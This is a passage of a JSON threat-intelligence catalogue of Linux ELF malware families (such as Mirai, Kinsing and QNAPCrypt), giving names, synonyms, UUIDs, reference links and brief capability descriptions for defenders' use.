"https://malpedia.caad.fkie.fraunhofer.de/details/elf.hiddenwasp", "https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought", "https://www.intezer.com/blog-hiddenwasp-malware-targeting-linux-systems/" ], "synonyms": [], "type": [] }, "uuid": "ae00d48d-c515-4ca9-a29c-8c53a78f8c73", "value": "HiddenWasp" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.hideandseek", "https://www.bleepingcomputer.com/news/security/hide-and-seek-becomes-first-iot-botnet-capable-of-surviving-device-reboots/", "https://threatlabs.avast.com/botnet", "https://blog.avast.com/hide-n-seek-botnet-continues", "https://labs.bitdefender.com/2018/01/new-hide-n-seek-iot-botnet-using-custom-built-peer-to-peer-communication-spotted-in-the-wild/", "https://blog.netlab.360.com/hns-botnet-recent-activities-en/", "https://www.bleepingcomputer.com/news/security/hns-evolves-from-iot-to-cross-platform-botnet/", "https://labs.bitdefender.com/2018/05/hide-and-seek-iot-botnet-resurfaces-with-new-tricks-persistence/", "https://www.bleepingcomputer.com/news/security/new-hns-iot-botnet-has-already-amassed-14k-bots/", "https://www.fortinet.com/blog/threat-research/searching-for-the-reuse-of-mirai-code--hide--n-seek-bot.html" ], "synonyms": [ "HNS" ], "type": [] }, "uuid": "41bf8f3e-bb6a-445d-bb74-d08aae61a94b", "value": "Hide and Seek" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.icnanker", "https://blog.netlab.360.com/icnanker-trojan-downloader-shc-en/" ], "synonyms": [], "type": [] }, "uuid": "cd9f128b-6502-4e1b-a5b3-25f3c7f01ca3", "value": "Icnanker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.iot_reaper", "http://blog.netlab.360.com/iot_reaper-a-rappid-spreading-new-iot-botnet-en/", "https://krebsonsecurity.com/2017/10/reaper-calm-before-the-iot-security-storm", "https://research.checkpoint.com/new-iot-botnet-storm-coming/" ], "synonyms": [ "IoTroop", "Reaper", "iotreaper" ], "type": [] }, "uuid": "37c357a1-ec09-449f-b5a9-c1ef1fba2de2", "value": "IoT Reaper" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.ipstorm", "https://www.anomali.com/blog/the-interplanetary-storm-new-malware-in-wild-using-interplanetary-file-systems-ipfs-p2p-network", "https://www.bitdefender.com/files/News/CaseStudies/study/376/Bitdefender-Whitepaper-IPStorm.pdf", "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", "https://www.intezer.com/blog/research/a-storm-is-brewing-ipstorm-now-has-linux-malware/" ], "synonyms": [ "InterPlanetary Storm" ], "type": [] }, "uuid": "a24f9c4b-1fa7-4da2-9929-064345389e67", "value": "IPStorm (ELF)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.jenx", "https://blog.radware.com/security/2018/02/jenx-los-calvos-de-san-calvicie/" ], "synonyms": [], "type": [] }, "uuid": "6a4365fc-8448-4270-ba93-0341788d004b", "value": "JenX" }, { "description": "Surfaced in late April 2020, Intezer describes Kaiji as a DDoS malware written in Go that spreads through SSH brute force attacks. Recovered function names are an English representation of Chinese words, hinting about the origin. The name Kaiji was given by MalwareMustDie based on strings found in samples.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.kaiji", "https://intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/", "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", "https://www.bitdefender.com/box/blog/iot-news/kaiji-new-strain-iot-malware-seizing-control-launching-ddos-attacks/", "https://blog.trendmicro.com/trendlabs-security-intelligence/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers/" ], "synonyms": [], "type": [] }, "uuid": "33fe7943-c1b3-48d5-b287-126390b091f0", "value": "Kaiji" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.kaiten", "https://www.akamai.com/us/en/multimedia/documents/state-of-the-internet/kaiten-std-router-ddos-malware-threat-advisory.pdf", "https://www.trendmicro.com/en_us/research/20/i/exposed-docker-server-abused-to-drop-cryptominer-ddos-bot-.html", "https://www.blackarrow.net/attackers-abuse-mobileirons-rce-to-deliver-kaiten/" ], "synonyms": [ "STD" ], "type": [] }, "uuid": "9b618703-58f6-4f0b-83a4-d4f13e2e5d12", "value": "Kaiten" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.kerberods", "https://isc.sans.edu/forums/diary/Vulnerable+Apache+Jenkins+exploited+in+the+wild/24916", "https://blog.trendmicro.com/trendlabs-security-intelligence/cve-2019-3396-redux-confluence-vulnerability-exploited-to-deliver-cryptocurrency-miner-with-rootkit/", "https://www.fortinet.com/blog/threat-research/rocke-variant-ready-to-box-mining-challengers.html", "https://blog.talosintelligence.com/2019/09/watchbog-patching.html", "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang" ], "synonyms": [], "type": [] }, "uuid": "e3787d95-2595-449e-8cf9-90845a9b7444", "value": "kerberods" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.kinsing", "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", "https://unit42.paloaltonetworks.com/cve-2020-25213/", "https://redcanary.com/blog/kinsing-malware-citrix-saltstack/", "https://www.cyberark.com/resources/threat-research-blog/kinsing-the-malware-with-two-faces", "https://twitter.com/IntezerLabs/status/1259818964848386048", "https://www.alibabacloud.com/blog/new-outbreak-of-h2miner-worms-exploiting-redis-rce-detected_595743", "https://www.trendmicro.com/en_us/research/20/k/analysis-of-kinsing-malwares-use-of-rootkit.html", "https://blog.aquasec.com/threat-alert-kinsing-malware-container-vulnerability" ], "synonyms": [ "h2miner" ], "type": [] }, "uuid": "ef0e3a56-e614-4dc1-bb20-0dcf7215c1ea", "value": "Kinsing" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.kobalos", "https://team-cymru.com/blog/2021/02/05/kobalos-malware-mapping/", "https://www.welivesecurity.com/wp-content/uploads/2021/01/ESET_Kobalos.pdf", "https://www.welivesecurity.com/2021/02/02/kobalos-complex-linux-threat-high-performance-computing-infrastructure/" ], "synonyms": [], "type": [] }, "uuid": "201d54ae-7fb0-4522-888c-758fa9019737", "value": "Kobalos" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.lady", "https://news.drweb.com/news/?i=10140&lng=en" ], "synonyms": [], "type": [] }, "uuid": "f8b91c34-b4f0-4ef2-b9fb-15bd5ec0a66d", "value": "Lady" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.leethozer", "https://blog.netlab.360.com/the-leethozer-botnet-en/" ], "synonyms": [], "type": [] }, "uuid": "e9f2857a-cb91-4715-ac8b-fdc89bc9a03e", "value": "LeetHozer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.lilock", "https://www.bleepingcomputer.com/news/security/lilocked-ransomware-actively-targeting-servers-and-web-sites/", "https://fossbytes.com/lilocked-ransomware-infected-linux-servers/", "https://id-ransomware.blogspot.com/2019/07/lilu-lilocked-ransomware.html" ], "synonyms": [ "Lilocked", "Lilu" ], "type": [] }, "uuid": "1328ed0d-9c1c-418b-9a96-1c538e4893bc", "value": "LiLock" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.lilyofthevalley", "https://github.com/En14c/LilyOfTheValley" ], "synonyms": [], "type": [] }, "uuid": "f789442f-8f50-4e55-8fbc-b93d22b5314e", "value": "lilyofthevalley" }, { "description": "BitDefender tracked the development of a Mirai-inspired botnet, dubbed LiquorBot, which seems to be actively in development and has recently incorporated Monero cryptocurrency mining features. Interestingly, LiquorBot is written in Go (also known as Golang), which offers some programming advantages over traditional C-style code, such as memory safety, garbage collection, structural typing, and even CSP-style concurrency. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.liquorbot", "https://www.zdnet.com/article/naive-iot-botnet-wastes-its-time-mining-cryptocurrency/", "https://labs.bitdefender.com/2020/01/hold-my-beer-mirai-spinoff-named-liquorbot-incorporates-cryptomining/" ], "synonyms": [], "type": [] }, "uuid": "3fe8f3db-4861-4e78-8b60-a794fe22ae3f", "value": "LiquorBot" }, { "description": "Loader and Cleaner components used in attacks against high-performance computing centers in Europe.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.loerbas", "https://atdotde.blogspot.com/2020/05/high-performance-hackers.html", "https://twitter.com/nunohaien/status/1261281419483140096", "https://www.cadosecurity.com/2020/05/16/1318/" ], "synonyms": [], "type": [] }, "uuid": "6332d57c-c46f-4907-8dac-965b15ffbed6", "value": "Loerbas" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.log_collector", "https://blog.netlab.360.com/dacls-the-dual-platform-rat/" ], "synonyms": [], "type": [] }, "uuid": "0473214a-2daa-4b5b-84bc-1bcbab11ef80", "value": "Log Collector" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.lootwodniw", "https://twitter.com/ddash_ct/status/1326887125103616000" ], "synonyms": [], "type": [] }, "uuid": "cfcf8608-03e7-4a5b-a46c-af342db2d540", "value": "Lootwodniw" }, { "description": "Masuta takes advantage of the EDB 38722 D-Link exploit.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.masuta", "https://threatpost.com/satori-author-linked-to-new-mirai-variant-masuta/129640/", "https://blog.newskysecurity.com/masuta-satori-creators-second-botnet-weaponizes-a-new-router-exploit-2ddc51cc52a7", "https://www.virusbulletin.com/virusbulletin/2018/12/vb2018-paper-tracking-mirai-variants/#h2-appendix-sample-sha256-hashes" ], "synonyms": [ "PureMasuta" ], "type": [] }, "uuid": "b9168ff8-01df-4cd0-9f70-fe9e7a11eccd", "value": "Masuta" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.matryosh", "https://blog.netlab.360.com/matryosh-botnet-is-spreading-en/" ], "synonyms": [], "type": [] }, "uuid": "4e989704-c49f-468c-95e1-1b7c5a58b3c4", "value": "Matryosh" }, { "description": "MESSAGETAP is a 64-bit ELF data miner initially loaded by an installation script. It is designed to monitor and save SMS traffic from specific phone numbers, IMSI numbers and keywords for subsequent theft.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.messagetap", "https://www.fireeye.com/blog/threat-research/2019/10/messagetap-who-is-reading-your-text-messages.html", "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", "https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", "https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought" ], "synonyms": [], "type": [] }, "uuid": "a07d6748-3557-41ac-b55b-f4348dc2a3c7", "value": "MESSAGETAP" }, { "description": "A x64 ELF file infector with non-destructive payload.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.midrashim", "https://www.guitmz.com/linux-midrashim-elf-virus/", "https://github.com/guitmz/midrashim" ], "synonyms": [], "type": [] }, "uuid": "fe220358-7118-4feb-b43e-cbdaf2ea09dc", "value": "Midrashim" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.mikey", "https://securitykitten.github.io/2016/12/14/mikey.html" ], "synonyms": [], "type": [] }, "uuid": "aae3b83d-a116-4ebc-aae0-f6327ef174ea", "value": "MiKey" }, { "description": "Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means \"future\" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on \"Hack Forums\" many variants of the Mirai family appeared, infecting mostly home networks all around the world.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai", "https://www.bleepingcomputer.com/news/security/mirai-activity-picks-up-once-more-after-publication-of-poc-exploit-code/", "https://blog.malwaremustdie.org/2020/02/mmd-0065-2021-linuxmirai-fbot-re.html", "http://osint.bambenekconsulting.com/feeds/", "https://www.stratosphereips.org/blog/2019/4/12/analysis-of-a-irc-based-botnet", "https://krebsonsecurity.com/2016/10/source-code-for-iot-botnet-mirai-released/", "https://unit42.paloaltonetworks.com/iot-vulnerabilities-mirai-payloads/", "https://krebsonsecurity.com/2017/12/mirai-iot-botnet-co-authors-plead-guilty/", "https://researchcenter.paloaltonetworks.com/2018/07/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/", "https://unit42.paloaltonetworks.com/hoaxcalls-mirai-target-legacy-symantec-web-gateways/", "https://blog.trendmicro.com/trendlabs-security-intelligence/mirai-botnet-exploit-weaponized-to-attack-iot-devices-via-cve-2020-5902/", "https://blog.reversinglabs.com/blog/mirai-botnet-continues-to-plague-iot-space", "https://blog.trendmicro.com/trendlabs-security-intelligence/new-mirai-variant-expands-arsenal-exploits-cve-2020-10173/", "https://isc.sans.edu/diary/22786", "https://github.com/jgamblin/Mirai-Source-Code", "http://www.simonroses.com/2016/10/mirai-ddos-botnet-source-code-binary-analysis/", "https://blog.trendmicro.com/trendlabs-security-intelligence/with-mirai-comes-miori-iot-botnet-delivered-via-thinkphp-remote-code-execution-exploit/", "https://blog.netlab.360.com/another-lilin-dvr-0-day-being-used-to-spread-mirai-en/", "https://www.politie.nl/nieuws/2019/oktober/2/11-servers-botnet-offline.html", "https://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/", "https://unit42.paloaltonetworks.com/mirai-compiled-for-new-processor-surfaces/", "https://prod-blog.avira.com/katana-a-new-variant-of-the-mirai-botnet" ], "synonyms": [ "Katana" ], "type": [] }, "uuid": "17e12216-a303-4a00-8283-d3fe92d0934c", "value": "Mirai (ELF)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.mokes", "https://securelist.com/from-linux-to-windows-new-family-of-cross-platform-desktop-backdoors-discovered/73503/" ], "synonyms": [], "type": [] }, "uuid": "6d5a5357-4126-4950-b8c3-ee78b1172217", "value": "Mokes (ELF)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.moobot", "https://blog.netlab.360.com/ddos-botnet-moobot-en/", "https://blog.netlab.360.com/moobot-0day-unixcctv-dvr-en/" ], "synonyms": [], "type": [] }, "uuid": "cd8deffe-eb0b-4451-8a13-11f6d291064a", "value": "MooBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.moose", "https://www.virusbulletin.com/uploads/pdf/magazine/2018/VB2018-Paquet-Clouston.pdf", "http://www.welivesecurity.com/2015/05/26/moose-router-worm/", "http://gosecure.net/2016/11/02/exposing-the-ego-market-the-cybercrime-performed-by-the-linux-moose-botnet/", "http://www.welivesecurity.com/2016/11/02/linuxmoose-still-breathing/" ], "synonyms": [], "type": [] }, "uuid": "7fdb91ea-52dc-499c-81f9-3dd824e2caa0", "value": "Moose" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.mozi", "https://cujo.com/upx-anti-unpacking-techniques-in-iot-malware/", "https://blog.netlab.360.com/mozi-another-botnet-using-dht/", "https://blog.centurylink.com/new-mozi-malware-family-quietly-amasses-iot-bots/" ], "synonyms": [], "type": [] }, "uuid": "236ba358-4c70-434c-a7ac-7a31e76c398a", "value": "Mozi" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.mrblack", "https://news.drweb.com/?i=5760&c=23&lng=en" ], "synonyms": [], "type": [] }, "uuid": "fc047e32-9cf2-4a92-861a-be882efd8a50", "value": "MrBlack" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.nextcry", "https://www.bleepingcomputer.com/news/security/new-nextcry-ransomware-encrypts-data-on-nextcloud-linux-servers/" ], "synonyms": [], "type": [] }, "uuid": "7ec8a41f-c72e-4832-a5a4-9d7380cea083", "value": "Nextcry Ransomware" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.ngioweb", "https://twitter.com/IntezerLabs/status/1324346324683206657", "https://blog.netlab.360.com/an-analysis-of-linux-ngioweb-botnet-en/", "https://blog.netlab.360.com/linux-ngioweb-v2-going-after-iot-devices-en/" ], "synonyms": [], "type": [] }, "uuid": "a4ad242c-6fd0-4b1d-8d97-8f48150bf242", "value": "Ngioweb (ELF)" }, { "description": "FireEye states that NOTROBIN is a utility written in Go 1.10 and compiled to a 64-bit ELF binary for BSD systems. It periodically scans for and deletes files matching filename patterns and content characteristics. The purpose seems to be to block exploitation attempts against the CVE-2019-19781 vulnerability; however, FireEye believes that NOTROBIN provides backdoor access to the compromised system.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.notrobin", "https://blog.dcso.de/a-curious-case-of-cve-2019-19781-palware-remove_bds/", "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", "https://news.sophos.com/en-us/2020/05/21/asnarok2/", "https://dcso.de/2020/01/16/a-curious-case-of-cve-2019-19781-palware-remove_bds/", "https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html", "https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought", "https://www.theregister.co.uk/2020/01/17/hackers_patch_citrix_vulnerability/", "https://www.fireeye.com/blog/threat-research/2020/01/vigilante-deploying-mitigation-for-citrix-netscaler-vulnerability-while-maintaining-backdoor.html" ], "synonyms": [ "remove_bds" ], "type": [] }, "uuid": "aaeb76b3-3885-4dc6-9501-4504fed9f20b", "value": "NOTROBIN" }, { "description": "Mirai variant by actor \"Anarchy\" that used CVE-2017-17215 in July 2018 to compromise 18,000+ devices.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.owari", "https://www.fortinet.com/blog/threat-research/a-wicked-family-of-bots.html", "https://twitter.com/360Netlab/status/1019759516789821441", "https://twitter.com/hrbrmstr/status/1019922651203227653", "https://blog.newskysecurity.com/understanding-the-iot-hacker-a-conversation-with-owari-sora-iot-botnet-author-117feff56863", "https://www.bleepingcomputer.com/news/security/router-crapfest-malware-author-builds-18-000-strong-botnet-in-a-day/", "https://www.scmagazine.com/malware-author-anarchy-builds-18000-strong-huawei-router-botnet/article/782395/", "https://twitter.com/ankit_anubhav/status/1019647993547550720" ], "synonyms": [], "type": [] }, "uuid": "ec67f206-6464-48cf-a012-3cdfc1278488", "value": "Owari" }, { "description": "According to Yarix digital security, this is a malware that allows to sniff on HTTPS traffic, implemented as Apache module.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.p0st5n1f3r", "https://www.vargroup.it/wp-content/uploads/2019/10/ReverseEngineering_SecurityReport_EN_2019.10.16-2.pdf" ], "synonyms": [], "type": [] }, "uuid": "cc48c6ae-d274-4ad0-b013-bd75041a20c8", "value": "p0sT5n1F3r" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.penquin_turla", "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", "https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf", "https://securelist.com/big-threats-using-code-similarity-part-1/97239/", "https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/", "https://securelist.com/apt-trends-report-q2-2020/97937/", "https://www.leonardocompany.com/documents/20142/10868623/Malware+Technical+Insight+_Turla+%E2%80%9CPenquin_x64%E2%80%9D.pdf", "https://securelist.com/files/2017/04/Penquins_Moonlit_Maze_PDF_eng.pdf", "https://securelist.com/files/2017/04/Penquins_Moonlit_Maze_AppendixB.pdf", "https://www.youtube.com/watch?v=JXsjRUxx47E", "https://twitter.com/juanandres_gs/status/944741575837528064" ], "synonyms": [], "type": [] }, "uuid": "262e0cf2-2fed-4d37-8d7a-0fd62c712840", "value": "Penquin Turla" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.perlbot", "https://jask.com/wp-content/uploads/2019/02/Shellbot-Campaign_v2.pdf", "https://documents.trendmicro.com/assets/Perl-Based_Shellbot_Looks_to_Target_Organizations_via_C&C_appendix.pdf", "https://www.trendmicro.com/en_us/research/20/l/teamtnt-now-deploying-ddos-capable-irc-bot-tntbotinger.html", "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", "https://twitter.com/Nocturnus/status/1308430959512092673", "https://unit42.paloaltonetworks.com/los-zetas-from-eleethub-botnet/" ], "synonyms": [ "DDoS Perl IrcBot", "ShellBot" ], "type": [] }, "uuid": "24b77c9b-7e7e-4192-8161-b6727728170f", "value": "PerlBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.persirai", "http://blog.trendmicro.com/trendlabs-security-intelligence/persirai-new-internet-things-iot-botnet-targets-ip-cameras/" ], "synonyms": [], "type": [] }, "uuid": "2ee05352-3d4a-448b-825d-9d6c10792bf7", "value": "Persirai" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.plead", "https://www.cyberandramen.net/home/blacktech-doesnt-miss-a-step-a-quick-analysis-of-a-busy-2020", "https://blogs.jpcert.or.jp/en/2020/11/elf-plead.html", "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", "https://www.macnica.net/file/mpressioncss_ta_report_2019_2_nopw.pdf", "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape" ], "synonyms": [], "type": [] }, "uuid": "de3c14aa-f9f4-4071-8e6e-a2c16a3394ad", "value": "PLEAD (ELF)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.prometei", "https://twitter.com/IntezerLabs/status/1338480158249013250", "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", "https://blog.talosintelligence.com/2020/07/prometei-botnet-and-its-quest-for-monero.html", "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html" ], "synonyms": [], "type": [] }, "uuid": "b6899bda-54e9-4953-8af5-22af39776b69", "value": "Prometei" }, { "description": "Unit 42 describes this as a malware used by Rocke Group that deploys an XMRig miner.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.pro_ocean", "https://unit42.paloaltonetworks.com/pro-ocean-rocke-groups-new-cryptojacking-malware/", "https://seguranca-informatica.pt/new-cryptojacking-malware-called-pro-ocean-is-now-attacking-apache-oracle-and-redis-servers/" ], "synonyms": [], "type": [] }, "uuid": "aa918c10-e5c7-4abd-b8c0-3c938a6675f5", "value": "Pro-Ocean" }, { "description": "Pupy is an open-source, cross-platform RAT and post-exploitation framework mainly written in python. Pupy can be loaded from various loaders, including PE EXE, reflective DLL, Linux ELF, pure python, powershell and APK. Most of the loaders bundle an embedded python runtime, python library modules in source/compiled/native forms as well as a flexible configuration. They bootstrap a python runtime environment mostly in-memory for the later stages of pupy to run in. Pupy can communicate using various transports, migrate into processes, load remote python code, python packages and python C-extensions from memory.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.pupy", "https://go.recordedfuture.com/hubfs/reports/cta-2020-0123.pdf", "https://github.com/n1nj4sec/pupy" ], "synonyms": [], "type": [] }, "uuid": "92a1288f-cc4d-47ca-8399-25fe5a39cf2d", "value": "pupy (ELF)" }, { "description": "The QNAPCrypt ransomware works similarly to other ransomware, including encrypting all files and delivering a ransom note. However, there are several important differences:\r\n\r\n1. The ransom note was included solely as a text file, without any message on the screen—naturally, because it is a server and not an endpoint.\r\n\r\n2. Every victim is provided with a different, unique Bitcoin wallet—this could help the attackers avoid being traced.\r\n\r\n3. Once a victim is compromised, the malware requests a wallet address and a public RSA key from the command and control server (C&C) before file encryption.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.qnapcrypt", "https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought", "https://www.intezer.com/blog-russian-cybercrime-group-fullofdeep-behind-qnapcrypt-ransomware-campaigns/", "https://www.anomali.com/blog/the-ech0raix-ransomware", "https://www.intezer.com/blog-seizing-15-active-ransomware-campaigns-targeting-linux-file-storage-servers/", "https://www.qnap.com/en/security-advisory/QSA-20-02", "https://www.intezer.com/blog/malware-analysis/when-viruses-mutate-did-suncrypt-ransomware-evolve-from-qnapcrypt", "https://www.ibm.com/downloads/cas/Z81AVOY7" ], "synonyms": [ "eCh0raix" ], "type": [] }, "uuid": "a0b12e5f-0257-41f1-beda-001ad944c4ca", "value": "QNAPCrypt" }, { "description": "The malware infects QNAP NAS devices, is persisting via various mechanisms and resists cleaning by preventing firmware updates and interfering with QNAP MalwareRemover. The malware steals passwords and hashes", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.qsnatch", "https://bin.re/blog/the-dga-of-qsnatch/", "https://www.kyberturvallisuuskeskus.fi/en/news/qsnatch-malware-designed-qnap-nas-devices", "https://us-cert.cisa.gov/ncas/alerts/aa20-209a", "https://www.ncsc.gov.uk/files/NCSC%20CISA%20Alert%20-QNAP%20NAS%20Devices.pdf" ], "synonyms": [], "type": [] }, "uuid": "48389957-30e2-4747-b4c6-8b8a9f15250f", "value": "QSnatch" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.r2r2", "https://www.guardicore.com/2018/06/operation-prowli-traffic-manipulation-cryptocurrency-mining/" ], "synonyms": [], "type": [] }, "uuid": "759f8590-a049-4c14-be8a-e6605e2cd43d", "value": "r2r2" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.rakos", "http://www.welivesecurity.com/2016/12/20/new-linuxrakos-threat-devices-servers-ssh-scan/", "https://journal.cecyf.fr/ojs/index.php/cybin/article/view/16/22" ], "synonyms": [], "type": [] }, "uuid": "4592384c-48a7-4e16-b492-7add50a7d2f5", "value": "Rakos" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.ransomexx", "https://www.ctir.gov.br/arquivos/alertas/2020/alerta_2020_03_ataques_de_ransomware.pdf", "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", "https://www.cybereason.com/blog/cybereason-vs.-ransomexx-ransomware", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", "https://securelist.com/ransomexx-trojan-attacks-linux-systems/99279/", "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout", "https://gustavopalazolo.medium.com/ransomexx-an%C3%A1lise-do-ransomware-utilizado-no-ataque-ao-stj-918001ec8195" ], "synonyms": [ "Defray777" ], "type": [] }, "uuid": "946814a1-957c-48ce-9068-fdef24a025bf", "value": "RansomEXX (ELF)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.raspberrypibotnet", "https://kindredsec.com/2019/06/03/code-analysis-of-basic-cryptomining-malware/" ], "synonyms": [], "type": [] }, "uuid": "8dee025b-2233-4cd8-af02-fcdcd40b378f", "value": "RaspberryPiBotnet" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.rat_hodin", "https://github.com/Thibault-69/RAT-Hodin-v2.5" ], "synonyms": [], "type": [] }, "uuid": "6aacf515-de49-4afc-a135-727c9beaab0b", "value": "rat_hodin" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.rbs_srv", "https://github.com/Thibault-69/Remote_Shell" ], "synonyms": [], "type": [] }, "uuid": "a08d9f8b-2cc5-48c2-8cce-ee713bcdc4b7", "value": "rbs_srv" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.redxor", "https://www.intezer.com/blog/malware-analysis/new-linux-backdoor-redxor-likely-operated-by-chinese-nation-state-actor/" ], "synonyms": [], "type": [] }, "uuid": "421b2ec7-d4e6-4fc8-9bd3-55fe26337aae", "value": "RedXOR" }, { "description": "A Trojan for Linux intended to infect machines with the SPARC architecture and Intel x86, x86-64 computers. The Trojan’s configuration data is stored in a file encrypted with XOR algorithm", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.rekoobe", "https://www.intezer.com/blog/malware-analysis/elf-malware-analysis-101-part-3-advanced-analysis/", "https://intezer.com/blog-linux-rekoobe-operating-with-new-undetected-malware-samples/", "https://vms.drweb.com/virus/?i=7754026&lng=en" ], "synonyms": [], "type": [] }, "uuid": "48b9a9fd-4c1a-428a-acc0-40b1a3fa7590", "value": "Rekoobe" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.reptile", "https://github.com/f0rb1dd3n/Reptile" ], 